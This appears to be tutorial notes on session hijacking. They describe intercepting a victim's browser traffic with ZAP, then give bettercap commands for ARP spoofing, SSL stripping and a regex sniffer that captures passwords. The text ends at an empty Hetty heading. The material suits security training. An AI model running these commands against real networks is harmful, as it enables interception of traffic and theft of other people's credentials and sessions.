1. Perform Session Hijacking

1. Hijack a session using Zed attack proxy (ZAP)

Set the browser proxy to go through the attack PC running ZAP. Now go to the Break tab (the equivalent of Intercept in Burp).

Now set the proxy settings

Click the Set break on all requests and responses icon on the main ZAP toolbar. This button sets and unsets a global breakpoint that will trap and display the next response or request from the victim's machine in the Break tab. Note: The Set break on all requests and responses icon turns automatically from green to red.

Now, when the victim browses a site, each request is intercepted and we can forward the requests one by one. We can modify the parameters as we want.

2. Perform session hijacking with bettercap

Reference

Bettercap help

bettercap -h

Start bettercap

sudo bettercap -iface eth0

Type help to list all commands.

To detect hosts on the network

net.probe on
net.show

Now enable SSL stripping (HTTPS to HTTP)

set http.proxy.sslstrip true

Now let's do the ARP poisoning

set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.29.33

Now turn on the HTTP proxy and the sniffer

http.proxy on
net.sniff on

To set the sniffer to capture only passwords, we can use the following:

set net.sniff.regexp '.*password=.+'

3. Intercept HTTP traffic using Hetty
